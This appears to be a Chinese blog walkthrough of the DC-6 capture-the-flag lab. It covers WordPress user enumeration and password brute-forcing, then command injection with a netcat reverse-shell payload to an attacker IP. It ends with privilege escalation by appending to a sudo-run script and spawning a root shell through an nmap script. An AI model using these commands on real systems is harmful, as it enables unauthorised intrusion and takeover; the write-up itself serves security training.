DC-6 靶机

DC_6

信息搜集

存活检测

在这里插入图片描述

详细扫描

image-20231023165338741

需要添加 DNS 解析

vim /etc/hosts

image-20231023165450298

后台网页扫描

dirsearch -u http://10.4.7.150

image-20231023165740307

网页信息搜集

  • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

    image-20231023172017074

  • 并且发现了网站的登陆页面

    image-20231023172452558

  • 直接上 wpscan

    扫描用户

    wpscan --url http://wordy --enumerate u 
    

    扫描出如下用户,将用户写入 users 文件中以供爆破

    image-20231023174329291

  • 尝试 cewl 生成密码字典

    image-20231023174804359

  • 爆破

    image-20231023175229931

  • 爆破失败

    image-20231023175257084

  • rockyou 字典爆破

    image-20231023212103641

    dc6 官网上提示过滤一些密码可以提升爆破速度

    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
    
    wpscan --url http://wordy --passwords passwords.txt --usernames users
    

    image-20231023212303251

  • 成功爆破

    用户名 mark

    密码 helpdesk01

    image-20231023213537470

  • 登录网页

    image-20231023213733116

Webshell

  • 搜索框内尝试命令注入

    image-20231023214759279

  • kali 开启 nc 监听

    image-20231023214840083

  • 输入连接反弹 shell 的命令

    10.1.1.1|nc -e /bin/bash 10.4.7.146 7777
    

    有长度限制

    image-20231023215002694

  • 修改源码中允许的最大长度

    输入反弹命令,点击 Lookup 连接

    image-20231023215429620

  • 成功反弹

    image-20231023215447981

ssh登录

  • 反弹成功后搜集系统中有用信息

    在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

    密码为 GSo7isUM1D4

    image-20231023220034640

    尝试 ssh 登录

  • 成功登录

    image-20231023220149331

提权

  • sudo -l 查看权限

    image-20231023220219626

  • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

  • 查看 backup.sh 文件

    image-20231023220904917

    发现是一个压缩命令

  • 查看文件权限

    image-20231023220931296

    所属组拥有全部权限

  • 查看 graham 信息

    image-20231023221450772

    发现与 jens 同属一个组,拥有对文件的修改权限

  • 向文件中写入提权命令

    echo bash >> backups.sh
    

    image-20231023221548032

  • sudo 执行

    sudo -u jens /home/jens/backups.sh
    

    image-20231023222159317

  • 切换到 jens 用户

    image-20231023222240231

  • sudo -l 查看 root 权限

    image-20231023222319457

  • nmap 提权

    TF=$(mktemp)
    echo 'os.execute("/bin/sh")' > $TF
    sudo nmap --script=$TF
    

    image-20231023223242815

  • 提权成功

    image-20231023223314391

总结

  • 命令注入,绕过
  • wpscan 用户扫描,密码爆破
  • nmap 提权
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值